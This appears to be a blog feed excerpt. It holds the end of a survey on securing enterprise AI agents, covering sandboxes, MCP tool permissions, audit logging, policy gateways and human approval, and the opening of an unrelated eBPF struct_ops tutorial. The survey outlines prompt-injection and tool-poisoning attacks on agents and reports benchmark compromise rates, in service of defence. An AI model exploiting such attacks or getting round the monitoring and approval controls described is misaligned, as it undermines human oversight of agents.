&lt;p&gt;On the defense side, one idea is dynamic tool vetting – before an agent uses a new tool, run that tool in a test mode on known benign inputs to see if it behaves correctly, or run it in a shadow sandbox with instrumented monitoring to detect unexpected actions. This is analogous to how app stores do a review, but potentially automated and at runtime. For now, this is an open research problem; we haven't seen full implementations yet, but it's identified in literature as a needed control.&lt;/p&gt;

&lt;p&gt;In summary, securing the tool ecosystem requires both preventive measures (secure coding practices for tool developers, automated scans for dangerous patterns like &lt;code&gt;execSync&lt;/code&gt; on inputs) and mitigations (running tools with least privilege, e.g. a tool that only needs to read a database should not also have OS write access). The principle of least privilege should apply at every level: the agent only has access to certain tools, the tool only has access to certain system resources. Achieving this in practice means plumbing through the user's identity and intent: e.g., if an agent is acting on behalf of Alice, the database tool should run under Alice's credentials or a role with her permissions, not a superuser. This is an area where enterprise IAM (Identity and Access Management) integration is critical – mapping the human user's identity to the agent's allowed actions. Recent work is exploring how to tie enterprise SSO/OAuth tokens into agent sessions in a fine-grained way, so that an agent cannot escalate its privileges beyond what the user would normally have through regular apps.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 Monitoring, Auditing, and Policy Enforcement
&lt;/h3&gt;

&lt;p&gt;Observability is notoriously difficult for AI systems because of their nondeterminism and unstructured outputs. But for agents, observability is non-negotiable in enterprise settings. Operators need to be able to ask: "What sequence of steps did the agent take? Why did it take a certain action? What tool calls were made with what parameters? Did anything unusual happen?" To that end, agent platforms are incorporating extensive logging and tracing capabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Structured Traces: There's a push to use standards like OpenTelemetry to trace agent execution like any microservice call graph. Each agent action (e.g. "called Tool X with params Y, got result Z") can be a span in a trace. This allows using existing APM (Application Performance Monitoring) tools to visualize agent workflows. Some commercial platforms now show a real-time step-by-step trace of the agent's reasoning and tool use (often known as an "Agent console" or debug pane).&lt;/li&gt;
&lt;li&gt;Semantic Logging: Beyond raw tool call logs, there's interest in capturing higher-level events. For example, flag if an agent's plan changed drastically mid-execution (could indicate it got confused or was manipulated), or if it requested an unusually large amount of data from a tool. Logging the content of prompts and responses is tricky (for privacy reasons), but logging the intents and outcomes is feasible. Additionally, cryptographic logging (hash chaining the logs) has been suggested so that forensic analysis can trust that logs weren't tampered with.&lt;/li&gt;
&lt;li&gt;Auditing for Compliance: In sectors like finance or healthcare, any automated system needs audit trails for compliance. If an agent made a change to a customer's record, we need to know who/what prompted that and that it was authorized. Solutions here include linking agent actions to a user session and storing that context (e.g. "Agent acted on behalf of Alice, in response to request R, at time T"). Some enterprises restrict certain tools to manual-confirmation mode where a human must approve the agent's action in a dashboard (common for things like executing a trade or sending an email). Ensuring the agent properly presents the action for approval (and doesn't hide the true intent) is an active UX/security challenge.&lt;/li&gt;
&lt;li&gt;Policy Engines: Enterprises are beginning to employ policy-as-code systems (like Open Policy Agent or custom rule engines) to govern agent behavior. For example, a policy might be: "Agents cannot run a query against the production database tool without a LIMIT clause, unless the user is in the admin role." When an agent attempts such a query, the policy engine can intercept and either block it or route it for approval. This ties into MCP Gateway architectures, where instead of the agent connecting directly to tool servers, it connects to a Gateway proxy that mediates all calls. Microsoft's preview of an MCP Gateway shows features like session persistence (to keep agent-tool sessions sticky) and a central place to enforce auth, rate limiting, etc. We can foresee these gateways becoming very sophisticated, implementing org-wide guardrails (e.g. no agent can call external web APIs that are not in a vetted list, to prevent data exfiltration).&lt;/li&gt;
&lt;li&gt;Evaluation and Testing: An emerging practice is to treat agents like code and develop evaluation suites for them. Before deploying an agent update (new model version or new tool), run a battery of scenarios (some normal, some adversarial) to see how it behaves. In late 2025, multiple benchmarks for agent safety were released to facilitate this. The MCP-SafetyBench is one such benchmark: it tests LLM agents on realistic multi-step tasks across five domains (web browsing, financial analysis, code repo management, navigation, and web search) while injecting 20 types of attacks (from prompt tampering to tool output manipulation). The sobering result: no current model is remotely immune to MCP-based attacks – even top-tier models had 30–48% of tasks compromised. They also found a negative correlation between task performance and security: models that are more capable at completing tasks also tend to be more exploitable, presumably because they more eagerly follow any instruction including malicious ones. This points to a fundamental safety-utility trade-off. Enterprises must calibrate how "aggressive" or autonomous they want the agent to be. Some are introducing adjustable risk settings – e.g. a slider from conservative (fewer tools, more confirmations) to aggressive (full autonomy, high risk). A metric called NRP (Normalized Risk-Performance) was proposed to quantify this balance. Ultimately, continuous evaluation will be key: as new attacks are discovered, adding them to test suites and ensuring the agent (with all its tools and policies) can handle or resist them.&lt;/li&gt;
&lt;/ul&gt;
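
&lt;p&gt;The hash-chained logging mentioned under Semantic Logging can be sketched in a few lines. Each entry stores the hash of the previous entry, so editing or deleting an earlier record breaks every hash after it. The entry layout and the function names &lt;code&gt;append_entry&lt;/code&gt; and &lt;code&gt;verify_chain&lt;/code&gt; are assumptions for this illustration, not a format defined by any of the platforms discussed.&lt;/p&gt;

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(prev_hash: str, event: dict) -> str:
    # Canonical JSON (sorted keys, fixed separators) so the hash is reproducible.
    payload = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


def append_entry(log: list, event: dict) -> None:
    """Append an event, linking it to the hash of the previous entry."""
    prev = log[-1]["hash"] if log else GENESIS
    log.append({"event": event, "prev": prev, "hash": _digest(prev, event)})


def verify_chain(log: list) -> bool:
    """Recompute every link; any edited, removed, or reordered entry fails."""
    prev = GENESIS
    for entry in log:
        if entry["prev"] != prev or entry["hash"] != _digest(prev, entry["event"]):
            return False
        prev = entry["hash"]
    return True


audit_log = []
append_entry(audit_log, {"actor": "agent-1", "on_behalf_of": "alice", "tool": "jira.comment"})
append_entry(audit_log, {"actor": "agent-1", "on_behalf_of": "alice", "tool": "db.query"})
print(verify_chain(audit_log))
```

&lt;p&gt;On its own the chain only shows internal consistency. For forensic value, the most recent hash has to be published or stored somewhere the agent and its host cannot rewrite.&lt;/p&gt;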

&lt;h3&gt;
  
  
  4.4 Identity, Authentication, and Governance
&lt;/h3&gt;

&lt;p&gt;A less glamorous but absolutely crucial aspect is identity and access management (IAM) for agents. When an agent performs an action, whose authority is it under? In a multi-user environment (say an AI assistant in a company), the agent might have to act as different users at different times. Traditional OAuth wasn't designed for a scenario where an LLM is effectively a headless client acting interactively on behalf of a user. Over the past months, developers have hit practical snags integrating OAuth with MCP. For example, the OAuth Dynamic Client Registration used by MCP (so an agent can automatically register itself to use an API) sometimes fails with enterprise IdPs due to strict URL checks. Some IdPs don't allow dynamic clients at all. There are calls to allow static client credentials or out-of-band provisioning for agents in such cases. This is more of a standards gap than a research one – it's being worked through in the MCP working group.&lt;/p&gt;

&lt;p&gt;From an enterprise architecture view, many want the agent to integrate with existing SSO. That means when an employee invokes an agent, the agent should use that employee's OAuth token to access tools. This ensures all actions are attributable and within the user's permissions. It's straightforward for some tools (an MCP server can simply require a token from the agent), but complex for others (e.g. a shell tool on a server – how to scope that per user?). Some solutions involve impersonation tokens or scoped API keys: e.g. the agent might have a key that only allows certain operations and is tagged to the user.&lt;/p&gt;

&lt;p&gt;The concept of "least privilege" comes into sharp focus here: the agent should only have the minimum access needed for the task, and ideally only for the duration needed. Techniques like OAuth token exchange or short-lived credentials are recommended. If an agent is spun up to do a build job, give it a temporary token that expires when the job ends, so even if it went rogue, it couldn't do damage later. One recent architecture paper emphasizes integrating enterprise identity with these agents so that all actions flow through the normal IAM checks and logs of the enterprise. That means, for instance, an agent using a Jira tool would appear in the Jira audit logs as "actions performed via AI agent on behalf of Bob". This transparency is needed for trust – people won't use the agent if it's a black box doing things in the shadows.&lt;/p&gt;
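
&lt;p&gt;To illustrate what "short-lived and scoped" means mechanically, the sketch below mints a token that names the user, lists the allowed scopes, and carries an expiry, all protected by an HMAC. It is a toy stand-in rather than OAuth token exchange: the token layout, the scope strings, and the hard-coded &lt;code&gt;SECRET&lt;/code&gt; are assumptions, and a production system would use its identity provider and a secrets manager instead.&lt;/p&gt;

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"demo-only-secret"  # assumption: real keys come from a secrets manager


def mint_token(user: str, scopes: list, ttl_seconds: float, now: float = None) -> str:
    """Issue a signed token tied to a user, a scope list, and an expiry time."""
    now = time.time() if now is None else now
    claims = {"sub": user, "scopes": sorted(scopes), "exp": now + ttl_seconds}
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode("utf-8"))
    sig = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return body.decode("ascii") + "." + sig


def check_token(token: str, required_scope: str, now: float = None) -> bool:
    """Accept only an untampered, unexpired token that carries the needed scope."""
    now = time.time() if now is None else now
    body, _, sig = token.rpartition(".")
    expected = hmac.new(SECRET, body.encode("utf-8"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig.encode("utf-8"), expected.encode("utf-8")):
        return False  # signature mismatch: reject before parsing any claims
    claims = json.loads(base64.urlsafe_b64decode(body))
    return claims["exp"] > now and required_scope in claims["scopes"]


token = mint_token("alice", ["build:run"], ttl_seconds=900)
print(check_token(token, "build:run"))
print(check_token(token, "deploy:prod"))
```

&lt;p&gt;The point of the expiry is the one made above: a credential leaked or misused by the agent stops working on its own, without anyone having to notice and revoke it.&lt;/p&gt;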

&lt;p&gt;Governance also extends to deciding which tasks to automate vs require human approval, what data agents are allowed to see, and how to prevent data leakage. Some enterprises restrict agents from accessing production data entirely, using them only on sanitized or test datasets until trust is built. Others put heavy monitoring on outputs (e.g. scanning everything the agent is about to output to a user for sensitive data). These are areas where data loss prevention (DLP) tools intersect with AI. A future vision is that an enterprise agent platform will integrate DLP classifiers that flag if an agent's response likely contains company confidential info, and either redact it or alert a human.&lt;/p&gt;

&lt;p&gt;Finally, we must mention user trust and adoption: beyond technical measures, building trust in agents involves user education and incremental rollout. Many organizations start with "read-only" agents (they can suggest actions but not execute them) and then gradually allow more autonomy as confidence grows. By having robust logs and a clear override path, users are more likely to accept the agent's help. Trust is also enhanced by making the agent's reasoning visible (hence the popularity of chain-of-thought traces displayed to users) and by giving users easy ways to correct or stop the agent. In essence, transparency and control are the antidotes to the unpredictability of AI.&lt;/p&gt;

&lt;p&gt;The advancements in the last half-year – from sandbox isolation to protocol standardization and new benchmarks – all aim to shrink the trust gap. Yet, open challenges remain (discussed in the next section) before one can confidently say an autonomous agent is as well-understood and controlled as a traditional software microservice.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Open Challenges and Future Directions
&lt;/h2&gt;

&lt;p&gt;Despite rapid progress, enterprise agent systems still have unsolved research questions and practical gaps. We conclude by highlighting some of the most pressing ones, as identified by recent discussions and publications, which represent opportunities for future work:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unified Cross-Layer Security Model: Today we have pieces – OAuth for identity, MCP scopes for tool access, sandbox for OS isolation – but they don't always speak the same language. There is no single policy that says, for example, "User X's agent can read from database Y but not write, and can run code but only use 2 CPU and no internet, and these conditions are cryptographically verified." A comprehensive model that ties user identity, agent capabilities, tool permissions, and sandbox OS permissions into one coherent framework is needed. Early proposals like AgentBound (inspired by mobile app permissions) are a start. In the future, we might see capability tokens that encode all these at once – the agent carries a token which the sandbox and tools all check, limiting what it can do in each context. Formal verification of such models (to prove an agent cannot do X) would greatly enhance trust.&lt;/li&gt;
&lt;li&gt;Rollback of External Side Effects: As noted, while we can roll back filesystem changes in a sandbox, we cannot yet roll back an email sent or a transaction made. Developing agent transaction protocols or sagas is an open challenge. One idea is to require critical tools to provide a compensation function – e.g. an MCP server for cloud VMs could have an "undo" for creating a VM (which would delete it). An agent planner could then use these to revert a series of actions if needed. This also ties into training the LLM or using a secondary verifier to decide when to roll back (e.g. if it notices an outcome diverges from expected state). Without solving this, enterprises will be hesitant to let agents perform irreversible operations autonomously.&lt;/li&gt;
&lt;li&gt;Advanced Threat Defenses: The taxonomy of potential attacks (context injection, tool poisoning, cross-tool data leaks, etc.) is growing. Defenses like context signing (cryptographically signing tool outputs or important prompts to prevent tampering) have been suggested but not widely implemented. The idea there is: an agent would only trust tool outputs that come with a signature or hash, so an attacker who intercepts or modifies the content (like a man-in-the-middle on an HTTP tool) would fail. Similarly, isolating tools from each other (so one tool can't directly influence another except through the agent's vetted reasoning) is a challenge – currently the agent's memory is the meeting point of all tool data, making it a melting pot where a malicious output in one tool can affect decisions involving another.&lt;/li&gt;
&lt;li&gt;Benchmarking and Standards for Evaluation: The community has started benchmarks like MCP-SafetyBench and MSB, but we need continuous evaluation pipelines. Perhaps an open leaderboard where agent developers can submit their agent (with a certain set of tools and policies) to be evaluated against a suite of scenarios, similar to how language models are benchmarked on GLUE or SuperGLUE for NLP. This could drive competition and improvement in safety. Also, evaluation should include cost and latency metrics – an agent that is safe but takes hours or $$$ to complete a task isn't practical. Balancing efficiency with safety will likely lead to innovations like adaptive risk modes (the agent switches to a more cautious approach if it senses something sensitive, trading speed for safety dynamically).&lt;/li&gt;
&lt;li&gt;Human-Agent Interaction Paradigms: AgentBay's approach to human-in-the-loop (HITL) interaction is one example of making agents more usable in the real world. There is still work to do on when and how an agent should ask for help. If it asks too often, it's not useful; if it asks too rarely, it might make an irrecoverable error. Finding that sweet spot (perhaps through reinforcement learning or feedback from users) is an ongoing area. Also, UI/UX research into how to present agent decisions to users in a clear way will be important (so users can confidently approve or deny actions). In enterprises, this might mean integrating agent controls into existing interfaces – e.g. showing an "AI agent suggestion" in a Jira ticket with a one-click approve.&lt;/li&gt;
&lt;li&gt;Cross-Organization Collaboration and Data Sharing: Enterprise agents often need to work across silos – e.g. an agent might coordinate between a supplier's system and the company's internal system. This raises questions of federated trust: how do you let an agent use two domains' tools in a secure way? This touches on things like standardizing how agents convey identity across org boundaries, and how audit logs are shared. The AAIF being under Linux Foundation hints at future inter-company standards to address this, since agents won't stop at the corporate firewall.&lt;/li&gt;
&lt;li&gt;Ethical and Compliance Considerations: Beyond security, enterprises must ensure agents comply with regulations and ethical norms. For example, if an agent interacts with personal data, privacy laws apply. How do we audit that an agent didn't retain or leak personal data beyond allowed purposes? Techniques like data tagging and tracking could be employed – marking certain outputs as containing sensitive info and preventing them from being used in contexts that aren't allowed. Ensuring AI explanations for decisions (especially if used in regulated domains) is another angle – if an agent makes a decision that affects a customer, one might need a rationale logged for compliance, which is tricky given the opaque reasoning of LLMs.&lt;/li&gt;
&lt;li&gt;Improving Model Robustness: Finally, at the heart is the LLM itself. There's ongoing research into fine-tuning models to be more resistant to manipulation (advantageous to safety but often at odds with capability). Techniques like constitutional AI or adversarial training on tool-use scenarios might yield models that inherently refuse certain dangerous actions or at least flag uncertainty. Also, specialized models for parsing and validating the agent's outputs (e.g. a secondary model that checks if a proposed action seems safe/rational) could be integrated. OpenAI and others are exploring "moderator" models that look at the main model's outputs. In agents, a "policy model" might examine the plan and tool uses and raise red flags for anything that violates training-time learned safe patterns.&lt;/li&gt;
&lt;/ul&gt;
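
&lt;p&gt;The compensation-function idea from the rollback item above follows the classic saga pattern: each step registers an "undo", and when a later step fails the completed steps are undone in reverse order. The sketch below is a minimal in-memory version; &lt;code&gt;run_saga&lt;/code&gt;, the step names, and the fake VM and email actions are all hypothetical, and it does not handle the hard case where a compensation itself fails.&lt;/p&gt;

```python
from typing import Callable, List, Tuple

# A step is (name, action, compensation); the compensation undoes the action.
Step = Tuple[str, Callable[[], None], Callable[[], None]]


def run_saga(steps: List[Step]) -> List[str]:
    """Run steps in order; on failure, compensate completed steps in reverse."""
    completed = []
    journal = []
    for name, action, compensate in steps:
        try:
            action()
        except Exception:
            journal.append(f"failed {name}")
            for done_name, undo in reversed(completed):
                undo()
                journal.append(f"undid {done_name}")
            break
        completed.append((name, compensate))
        journal.append(f"did {name}")
    return journal


# Toy side effects standing in for real tool calls.
vms = set()


def create_vm() -> None:
    vms.add("vm-1")


def delete_vm() -> None:
    vms.discard("vm-1")


def send_email() -> None:
    raise RuntimeError("mail gateway unavailable")


result = run_saga([
    ("create_vm", create_vm, delete_vm),
    ("send_email", send_email, lambda: None),
])
print(result)
print(vms)
```

&lt;p&gt;Note what the pattern cannot do: an email that was actually sent has no true inverse, so the "compensation" for such a step is at best a follow-up correction. That gap is why irreversible tools tend to stay behind human approval.&lt;/p&gt;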

&lt;p&gt;Outlook: The next year will likely bring a maturation of the agent ecosystem akin to what 2010-2015 saw for cloud microservices – an explosion of tools and best practices to handle deployment, security, monitoring, and standardization. The formation of AAIF is a strong indicator that industry players see collaboration as the way forward; no one wants a fragmented, Wild West environment when so much is at stake (both in terms of safety and potential business value). We will probably see AgentOps teams emerge in organizations, analogous to MLOps, focused on managing and supervising fleets of agents. They'll use dashboards (like GitHub's Agent HQ mission control) to oversee agent activities across the enterprise. And just as DevOps developed guardrails and CI/CD for code, AgentOps will develop guardrails and continuous evaluation for autonomous AI behaviors.&lt;/p&gt;

&lt;p&gt;In conclusion, enterprise agent systems are transitioning from the lab to the real world, carrying with them both excitement (unprecedented automation capabilities) and caution (novel failure modes). Sandbox architectures and protocols like MCP have laid a foundation that makes these systems more modular, controllable, and interoperable than before. Yet, achieving a level of trust comparable to traditional software will require continued innovation in permission modeling, verification, and human oversight integration. The last half-year's progress has been remarkable – what was mostly sci-fi a year ago (multiple AIs collaborating on complex tasks with minimal human input) is now demonstrably feasible. The coming months will likely see pilots turn into production deployments in enterprises, each teaching new lessons. By actively sharing these lessons and converging on open standards and benchmarks, the community can accelerate the safe adoption of agentic AI. The end goal is an ecosystem where AI agents become reliable teammates – tirelessly automating drudgery and navigating complexity – while humans retain ultimate control and understanding of their behavior. The path to get there is challenging, but as this survey shows, the groundwork is rapidly being put in place.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.infoq.com/news/2025/12/agent-sandbox-kubernetes/" rel="noopener noreferrer"&gt;Open-Source Agent Sandbox Enables Secure Deployment of AI Agents on Kubernetes&lt;/a&gt; - InfoQ News on Agent Sandbox, gVisor/Kata isolation, CRD for stateful agents, OWASP Top 10 for AI Agents&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techinformed.com/google-launches-agent-sandbox-for-secure-ai-agents-on-kubernetes/" rel="noopener noreferrer"&gt;Google launches Agent Sandbox for secure AI agents on Kubernetes&lt;/a&gt; - TechInformed on gVisor isolation, pre-warmed pools (90% faster startups), Pod Snapshots&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.linuxfoundation.org/press/linux-foundation-announces-the-formation-of-the-agentic-ai-foundation" rel="noopener noreferrer"&gt;Linux Foundation Announces Formation of Agentic AI Foundation (AAIF)&lt;/a&gt; - MCP, Goose, AGENTS.md contributions; cross-industry support&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.infoq.com/articles/mcp-connector-for-building-smarter-modular-ai-agents/" rel="noopener noreferrer"&gt;MCP: The Universal Connector for Building Smarter, Modular AI Agents&lt;/a&gt; - InfoQ on MCP benefits (M×N to M+N integration, interoperability)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://devblogs.microsoft.com/foundry/introducing-microsoft-agent-framework-the-open-source-engine-for-agentic-ai-apps/" rel="noopener noreferrer"&gt;Introducing Microsoft Agent Framework&lt;/a&gt; - Microsoft Foundry Blog on open standards (MCP, A2A, OpenAPI) and enterprise readiness&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://devblogs.microsoft.com/foundry/whats-new-in-microsoft-foundry-oct-nov-2025/" rel="noopener noreferrer"&gt;What's new in Microsoft Foundry (Oct/Nov 2025)&lt;/a&gt; - Microsoft Agent Framework updates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.infoworld.com/article/4080888/github-launches-agent-hq-to-bring-order-to-ai-powered-coding.html" rel="noopener noreferrer"&gt;GitHub launches Agent HQ for AI-powered coding&lt;/a&gt; - InfoWorld on managing multiple coding agents with governance, audit, and mission control&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/advisories/GHSA-gjv4-ghm7-q58q" rel="noopener noreferrer"&gt;CVE-2025-53355: mcp-server-kubernetes command injection vulnerability&lt;/a&gt; - GitHub Advisory on unsanitized execSync and prompt-injection exploit via pod logs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2510.21236" rel="noopener noreferrer"&gt;Securing AI Agent Execution (arXiv:2510.21236)&lt;/a&gt; - Bühler et al. 2025: AgentBound permission framework for MCP tools, auto-policy generation (~80% accuracy)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2512.04367" rel="noopener noreferrer"&gt;AgentBay: A Hybrid Interaction Sandbox (arXiv:2512.04367)&lt;/a&gt; - Piao et al. 2025: unified sandbox with AI API control + live human takeover (48% higher task success with HITL)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openreview.net/pdf/d8cae2e9cc3facabfe822f031acdbe043046f70f.pdf" rel="noopener noreferrer"&gt;MCP-SafetyBench (OpenReview)&lt;/a&gt; - Lan et al. 2025: real MCP server benchmark, 30–48% attack success on tested LLMs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/@adnanmasood/model-context-protocol-mcp-attacks-threats-taxonomy-and-defenses-for-tool-using-llms-de65fbffedd3" rel="noopener noreferrer"&gt;MCP Attacks: Threats, Taxonomy, and Defenses&lt;/a&gt; - Adnan Masood on threat taxonomy for tool-using LLMs&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>agents</category>
      <category>sandbox</category>
      <category>ai</category>
    </item>
    <item>
      <title>eBPF Tutorial: Extending Kernel Subsystems with BPF struct_ops</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 27 Jan 2026 07:20:44 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-extending-kernel-subsystems-with-bpf-structops-2n3g</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-extending-kernel-subsystems-with-bpf-structops-2n3g</guid>
      <description>&lt;p&gt;Have you ever wanted to extend kernel behavior—like adding a custom scheduler, network protocol, or security policy—but were put off by the complexity of writing and maintaining a full kernel module? What if you could define the logic directly in eBPF, with dynamic updates, safe execution, and programmable control, all without recompiling the kernel or risking system stability?&lt;/p&gt;

&lt;p&gt;This is the power of &lt;strong&gt;BPF struct_ops&lt;/strong&gt;. This advanced eBPF feature allows BPF programs to implement the callbacks of a kernel operations structure, effectively letting you "plug in" custom logic to extend kernel subsystems. It goes beyond simple tracing or filtering: you can now implement core kernel operations in BPF. For example, we use it to implement GPU scheduling and memory offloading extensions in GPU drivers (see our &lt;a href="https://lpc.events/event/19/contributions/2168/" rel="noopener noreferrer"&gt;LPC 2025 talk&lt;/a&gt; and the &lt;a href="https://github.com/eunomia-bpf/gpu_ext" rel="noopener noreferrer"&gt;gpu_ext project&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;In this tutorial, we will explore how to use &lt;code&gt;struct_ops&lt;/code&gt; to dynamically extend kernel subsystem behavior. We won't be using the common TCP congestion control example. Instead, we'll take a more fundamental approach that mirrors the extensibility seen with kfuncs. We will create a custom kernel module that defines a new, simple subsystem with a set of operations. This module will act as a placeholder, creating new attachment points for our BPF programs. Then, we will write a BPF program to implement the logic for these operations. This demonstrates a powerful pattern: using a minimal kernel module to expose a &lt;code&gt;struct_ops&lt;/code&gt; interface, and then using BPF to provide the full, complex implementation.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code for this tutorial can be found here: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF struct_ops: Programmable Kernel Subsystems
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Challenge: Extending Kernel Behavior Safely and Dynamically
&lt;/h3&gt;

&lt;p&gt;Traditionally, adding new functionality to the Linux kernel, such as a new file system, a network protocol, or a scheduler algorithm, requires writing a kernel module. While powerful, kernel modules come with significant challenges:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Complexity:&lt;/strong&gt; Kernel development has a steep learning curve and requires a deep understanding of kernel internals.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Safety:&lt;/strong&gt; A bug in a kernel module can easily crash the entire system. There are no sandboxing guarantees.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Maintenance:&lt;/strong&gt; Kernel modules must be maintained and recompiled for different kernel versions, creating a tight coupling with the kernel's internal APIs.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;eBPF has traditionally addressed these issues for tracing, networking, and security by providing a safe, sandboxed environment. However, most eBPF programs are attached to existing hooks (like tracepoints, kprobes, or XDP) and react to events. They don't typically &lt;em&gt;implement&lt;/em&gt; the core logic of a kernel subsystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Implementing Kernel Operations with BPF
&lt;/h3&gt;

&lt;p&gt;BPF &lt;code&gt;struct_ops&lt;/code&gt; bridges this gap. It allows BPF programs to implement the members of a kernel operations structure, a common kernel pattern in which a structure holds function pointers for a set of operations. Instead of these pointers pointing to functions compiled into the kernel or a module, they can point to BPF programs.&lt;/p&gt;

&lt;p&gt;This is a paradigm shift. It's no longer just about observing or filtering; it's about &lt;em&gt;implementing&lt;/em&gt;. Imagine a kernel subsystem that defines a set of operations like &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;. With &lt;code&gt;struct_ops&lt;/code&gt;, you can write BPF programs that serve as the implementation for these very functions.&lt;/p&gt;
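&lt;p&gt;To make the function-pointer pattern concrete, here is a minimal userspace sketch in plain C. It is an analogy under stated assumptions, not kernel or BPF code: &lt;code&gt;demo_ops&lt;/code&gt;, &lt;code&gt;install_ops&lt;/code&gt;, and the other names are hypothetical and exist only for illustration. The caller always goes through the operations table, so replacing the table changes behavior without touching the caller, which is roughly the role a BPF program plays when it fills in a &lt;code&gt;struct_ops&lt;/code&gt;.&lt;/p&gt;

```c
/* Userspace analogy only: every name here is hypothetical, none is a kernel API. */

/* An "ops" structure: a table of function pointers that callers go through. */
struct demo_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
};

/* Default implementations, comparable to code compiled into the subsystem. */
static int default_test_1(void)
{
    return 0;
}

static int default_test_2(int a, int b)
{
    (void)a;
    (void)b;
    return 0;
}

/* Replacement implementations, standing in for what a BPF program would supply. */
static int custom_test_1(void)
{
    return 42;
}

static int custom_test_2(int a, int b)
{
    return a + b;
}

static const struct demo_ops custom_ops = {
    .test_1 = custom_test_1,
    .test_2 = custom_test_2,
};

/* The table the "subsystem" consults; it starts with the defaults. */
static struct demo_ops active_ops = {
    .test_1 = default_test_1,
    .test_2 = default_test_2,
};

/* Swap in a new implementation at run time by copying its table. */
static void install_ops(struct demo_ops new_ops)
{
    active_ops = new_ops;
}

/* Caller side: it never names an implementation, only the active table. */
static int subsystem_test_1(void)
{
    return active_ops.test_1();
}

static int subsystem_test_2(int a, int b)
{
    return active_ops.test_2(a, b);
}
```

&lt;p&gt;With the default table, &lt;code&gt;subsystem_test_2(2, 3)&lt;/code&gt; returns 0; after &lt;code&gt;install_ops(custom_ops)&lt;/code&gt; the same call returns 5. In the kernel, the swap goes through registration and unregistration callbacks and the BPF verifier rather than a plain assignment.&lt;/p&gt;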

&lt;p&gt;This approach is similar in spirit to how &lt;strong&gt;kfuncs&lt;/strong&gt; allow developers to extend the capabilities of BPF. With kfuncs, we can add custom helper functions to the BPF runtime by defining them in a kernel module. With &lt;code&gt;struct_ops&lt;/code&gt;, we take this a step further: we define a whole new &lt;em&gt;set of attach points&lt;/em&gt; for BPF programs, effectively creating a custom, BPF-programmable subsystem within the kernel.&lt;/p&gt;

&lt;p&gt;The benefits are immense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Implementation&lt;/strong&gt;: You can load, update, and unload the BPF programs implementing the subsystem logic on the fly, without restarting the kernel or the application.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Safety&lt;/strong&gt;: The BPF verifier ensures that the BPF programs are safe to run, preventing common pitfalls like infinite loops, out-of-bounds memory access, and system crashes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexibility&lt;/strong&gt;: The logic is in the BPF program, which can be developed and updated independently of the kernel module that defines the &lt;code&gt;struct_ops&lt;/code&gt; interface.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Programmability&lt;/strong&gt;: Userspace applications can interact with and control the BPF programs, allowing for dynamic configuration and control of the kernel subsystem's behavior.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In this tutorial, we will walk through a practical example of this pattern. We'll start with a kernel module that defines a new &lt;code&gt;struct_ops&lt;/code&gt; type, and then we'll write a BPF program to implement its functions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Kernel Module: Defining the Subsystem Interface
&lt;/h2&gt;

&lt;p&gt;The first step is to create a kernel module that defines our new BPF-programmable subsystem. This module doesn't need to contain much logic itself. Its primary role is to define a &lt;code&gt;struct_ops&lt;/code&gt; type and register it with the kernel, creating a new attachment point for BPF programs. It also provides a mechanism to trigger the operations, which in our case will be a simple proc file.&lt;/p&gt;

&lt;p&gt;This approach is powerful because it separates the interface definition (in the kernel module) from the implementation (in the BPF program). The kernel module is stable and minimal, while the complex, dynamic logic resides in the BPF program, which can be updated at any time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete Kernel Module: &lt;code&gt;module/hello.c&lt;/code&gt;
&lt;/h3&gt;

